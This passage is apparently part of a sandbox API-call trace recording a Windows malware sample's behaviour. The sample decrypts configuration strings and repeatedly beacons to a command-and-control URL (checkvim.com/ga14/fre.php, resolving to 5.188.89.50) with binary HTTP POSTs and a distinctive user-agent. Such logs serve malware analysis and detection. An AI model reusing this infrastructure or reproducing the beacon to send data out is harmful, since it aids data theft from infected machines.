phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0220.350] GetProcessHeap () returned 0x840000 [0220.350] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0220.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.351] CryptImportKey (in: hProv=0x86fb50, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0220.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.352] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0220.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.353] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.353] GetProcessHeap () returned 0x840000 [0220.354] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0220.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.355] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0220.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.356] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0220.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.356] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0220.356] GetProcessHeap () returned 0x840000 [0220.356] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0220.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0220.357] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0220.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0220.358] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0220.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0220.359] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0220.359] GetProcessHeap () returned 0x840000 [0220.359] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0220.360] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0220.362] GetProcessHeap () returned 0x840000 [0220.362] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0220.362] socket (af=2, type=1, protocol=6) returned 0x2c8 [0220.362] connect (s=0x2c8, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0220.471] FreeAddrInfoW (pAddrInfo=0x871218*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0220.472] GetProcessHeap () returned 0x840000 [0220.472] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0220.472] GetProcessHeap () returned 0x840000 [0220.472] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0220.473] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0220.474] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0220.474] GetProcessHeap () returned 0x840000 [0220.474] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0220.474] GetProcessHeap () returned 0x840000 [0220.474] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0220.474] GetProcessHeap () returned 0x840000 [0220.474] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f830 [0220.474] GetProcessHeap () returned 0x840000 [0220.474] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0220.475] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0220.476] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0220.476] GetProcessHeap () returned 0x840000 [0220.476] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0220.476] GetProcessHeap () returned 0x840000 [0220.476] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0220.476] send (s=0x2c8, buf=0x873a58*, len=237, flags=0) returned 237 [0220.478] send (s=0x2c8, buf=0x87eb58*, len=159, flags=0) returned 159 [0220.478] GetProcessHeap () returned 0x840000 [0220.478] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0220.478] recv (in: s=0x2c8, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0220.878] GetProcessHeap () returned 0x840000 [0220.878] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0220.878] GetProcessHeap () returned 0x840000 [0220.878] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f830 | out: hHeap=0x840000) returned 1 [0220.878] GetProcessHeap () returned 0x840000 [0220.878] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0220.879] GetProcessHeap () returned 0x840000 [0220.879] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0220.879] closesocket (s=0x2c8) returned 0 [0220.921] GetProcessHeap () returned 0x840000 [0220.921] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0220.921] GetProcessHeap () returned 0x840000 [0220.921] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0220.921] GetProcessHeap () returned 0x840000 [0220.921] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0220.921] GetProcessHeap () returned 0x840000 [0220.921] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0220.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x924) returned 0x2c8 [0220.970] Sleep (dwMilliseconds=0xea60) [0220.975] GetProcessHeap () returned 0x840000 [0220.975] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0220.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.976] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0220.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.985] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0220.995] GetProcessHeap () returned 0x840000 [0220.995] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0220.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.996] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5f0) returned 1 [0220.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.998] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0220.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0220.999] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.999] GetProcessHeap () returned 0x840000 [0220.999] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0221.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.001] CryptDecrypt (in: hKey=0x87e5f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0221.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.002] CryptDestroyKey (hKey=0x87e5f0) returned 1 [0221.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.003] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0221.004] GetProcessHeap () returned 0x840000 [0221.004] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0221.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.005] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0221.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.006] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0221.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.007] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0221.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.009] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0221.009] GetProcessHeap () returned 0x840000 [0221.009] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0221.009] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0221.009] GetProcessHeap () returned 0x840000 [0221.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0221.009] GetProcessHeap () returned 0x840000 [0221.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0221.009] GetProcessHeap () returned 0x840000 [0221.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0221.009] GetProcessHeap () returned 0x840000 [0221.011] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f9e0 [0221.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.022] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0221.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.032] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0221.040] GetProcessHeap () returned 0x840000 [0221.040] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0221.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.041] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6b0) returned 1 [0221.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.043] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0221.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.044] CryptSetKeyParam (hKey=0x87e6b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.044] GetProcessHeap () returned 0x840000 [0221.044] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0221.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.046] CryptDecrypt (in: hKey=0x87e6b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f9e0, pdwDataLen=0x19f9a4 | out: pbData=0x87f9e0, pdwDataLen=0x19f9a4) returned 1 [0221.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.053] CryptDestroyKey (hKey=0x87e6b0) returned 1 [0221.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.054] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0221.054] GetProcessHeap () returned 0x840000 [0221.054] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0221.056] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.056] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0221.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.057] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0221.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.059] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0221.059] GetProcessHeap () returned 0x840000 [0221.059] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0221.059] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0221.100] GetProcessHeap () returned 0x840000 [0221.100] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0221.100] socket (af=2, type=1, protocol=6) returned 0x2cc [0221.100] connect (s=0x2cc, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0221.222] FreeAddrInfoW (pAddrInfo=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0221.222] GetProcessHeap () returned 0x840000 [0221.222] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0221.222] GetProcessHeap () returned 0x840000 [0221.222] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0221.223] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0221.224] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0221.224] GetProcessHeap () returned 0x840000 [0221.224] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0221.224] GetProcessHeap () returned 0x840000 [0221.224] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0221.224] GetProcessHeap () returned 0x840000 [0221.224] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0221.224] GetProcessHeap () returned 0x840000 [0221.224] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0221.225] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0221.226] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0221.226] GetProcessHeap () returned 0x840000 [0221.226] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0221.226] GetProcessHeap () returned 0x840000 [0221.226] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0221.226] send (s=0x2cc, buf=0x873a58*, len=237, flags=0) returned 237 [0221.227] send (s=0x2cc, buf=0x87eb58*, len=159, flags=0) returned 159 [0221.227] GetProcessHeap () returned 0x840000 [0221.227] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0221.227] recv (in: s=0x2cc, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0221.592] GetProcessHeap () returned 0x840000 [0221.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0221.592] GetProcessHeap () returned 0x840000 [0221.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0221.592] GetProcessHeap () returned 0x840000 [0221.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0221.592] GetProcessHeap () returned 0x840000 [0221.592] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0221.592] closesocket (s=0x2cc) returned 0 [0221.594] GetProcessHeap () returned 0x840000 [0221.594] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0221.594] GetProcessHeap () returned 0x840000 [0221.594] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0221.594] GetProcessHeap () returned 0x840000 [0221.594] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0221.594] GetProcessHeap () returned 0x840000 [0221.594] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0221.594] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xa08) returned 0x2cc [0221.596] Sleep (dwMilliseconds=0xea60) [0221.597] GetProcessHeap () returned 0x840000 [0221.597] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0221.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.598] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0221.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.636] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0221.652] GetProcessHeap () returned 0x840000 [0221.652] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0221.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.653] CryptImportKey (in: hProv=0x86ff90, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0221.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.655] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0221.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.656] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.656] GetProcessHeap () returned 0x840000 [0221.656] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0221.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.657] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0221.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.659] CryptDestroyKey (hKey=0x87e370) returned 1 [0221.659] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.660] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0221.660] GetProcessHeap () returned 0x840000 [0221.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0221.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.661] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0221.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.662] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0221.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.663] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0221.666] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0221.666] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0221.666] GetProcessHeap () returned 0x840000 [0221.666] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0221.666] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0221.667] GetProcessHeap () returned 0x840000 [0221.667] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0221.667] GetProcessHeap () returned 0x840000 [0221.667] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0221.667] GetProcessHeap () returned 0x840000 [0221.667] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0221.667] GetProcessHeap () returned 0x840000 [0221.667] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0221.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.668] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0221.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.675] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0221.684] GetProcessHeap () returned 0x840000 [0221.684] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0221.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.686] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e630) returned 1 [0221.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.687] CryptSetKeyParam (hKey=0x87e630, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0221.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.688] CryptSetKeyParam (hKey=0x87e630, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.688] GetProcessHeap () returned 0x840000 [0221.689] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0221.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.690] CryptDecrypt (in: hKey=0x87e630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0221.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.691] CryptDestroyKey (hKey=0x87e630) returned 1 [0221.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0221.692] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0221.692] GetProcessHeap () returned 0x840000 [0221.692] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 